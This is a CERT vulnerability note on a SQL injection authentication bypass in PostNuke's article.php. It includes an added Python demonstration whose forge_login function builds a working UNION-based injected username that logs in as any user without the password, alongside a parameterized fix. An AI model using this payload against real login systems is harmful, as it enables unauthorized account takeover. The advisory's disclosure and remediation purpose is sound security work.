
CERT Coordination Center

PostNuke does not adequately validate user input, allowing a malicious user to bypass user authentication via SQL injection

Vulnerability Note VU#921547

Original Release Date: 2002-09-27 | Last Revised: 2002-09-27

Overview

PostNuke does not adequately filter user input, allowing arbitrary MySQL query execution and user authentication without a password.

Description

PostNuke is a web content management system based on PHP-Nuke, written in PHP. The article.php component of PostNuke versions 0.62, 0.63, and 0.64 does not adequately filter the "user" CGI variable before passing it to a MySQL query. Attackers may exploit this vulnerability to execute arbitrary MySQL queries.

In addition, the vulnerable MySQL query is used to authenticate users. By knowing only a PostNuke username and ID, attackers may tamper with the MySQL query to achieve a positive authentication result for that PostNuke user.
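The following is an added illustration of the vulnerability class described above, not PostNuke's own code: it models an authentication lookup that interpolates an unfiltered username into the query and then compares the stored password hash with one supplied by the client. Because the attacker controls the WHERE clause, a UNION clause can return a fabricated row whose hash the attacker chose, so the comparison succeeds knowing only the victim's user ID and username. SQLite stands in for MySQL (the `-- ` comment syntax is accepted by both), the table layout, the MD5 hashing, and the function names (`authenticate_vulnerable`, `authenticate_hardened`, `forge_login`) are assumptions for this example, and the sample users are constructed inline.

```python
import hashlib
import hmac
import sqlite3

# Assumed hash scheme for the example only (MD5 is not a recommendation).
def pw_hash(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()

def build_db() -> sqlite3.Connection:
    """Constructed in-memory user table standing in for the MySQL users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, uname TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", pw_hash("correct horse")), (2, "alice", pw_hash("alicepw"))],
    )
    conn.commit()
    return conn

DB = build_db()

def authenticate_vulnerable(uid: int, uname: str, supplied_hash: str) -> bool:
    """Unfiltered 'user' data is spliced straight into the SQL text.

    The attacker controls the tail of the statement, so the row that comes
    back (and therefore the stored hash that is compared) is attacker-chosen.
    """
    sql = f"SELECT uid, uname, pass FROM users WHERE uid='{uid}' AND uname='{uname}'"
    row = DB.execute(sql).fetchone()
    return row is not None and row[2] == supplied_hash

def authenticate_hardened(uid: int, uname: str, supplied_hash: str) -> bool:
    """Same lookup with bound parameters: the username can only ever be data,
    never SQL syntax, so the returned row is always a real user record."""
    row = DB.execute(
        "SELECT uid, uname, pass FROM users WHERE uid=? AND uname=?", (uid, uname)
    ).fetchone()
    return row is not None and hmac.compare_digest(row[2], supplied_hash)

def forge_login(uid: int, uname: str, attacker_password: str) -> tuple[str, str]:
    """Build the injected username and matching hash for a target uid/uname.

    The victim's real password is never needed: the UNION row carries a hash
    of a password the attacker picked, and the trailing comment discards the
    closing quote that the original query would have appended.
    """
    h = pw_hash(attacker_password)
    injected_uname = f"x' UNION SELECT {uid}, '{uname}', '{h}' -- "
    return injected_uname, h

if __name__ == "__main__":
    payload, h = forge_login(1, "admin", "attacker-chosen")
    print("vulnerable:", authenticate_vulnerable(1, payload, h))  # True
    print("hardened:  ", authenticate_hardened(1, payload, h))    # False
```

Running the block shows a legitimate login succeeding against both functions while the forged login only succeeds against the interpolated query; the bound-parameter version is the fix a maintainer would apply, and the constant-time comparison is an unrelated hardening added while touching the code.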

Impact

Attackers may execute arbitrary MySQL queries and log in as other users without their passwords.

Solution

Apply a patch

Upgrade to PostNuke 0.71, available at:

http://www.postnuke.com/modules.php?op=modload&name=Downloads&file=index&req=getit&lid=169

Vendor Information


CVSS Metrics


References

Acknowledgements

Thanks to Magnus Skjegstad for reporting this vulnerability.

This document was written by Shawn Van Ittersum.

Other Information

CVE IDs: None
Severity Metric: 4.70
Date Public: 2001-10-13
Date First Published: 2002-09-27
Date Last Updated: 2002-09-27 16:12 UTC
Document Revision: 4

Sponsored by CISA.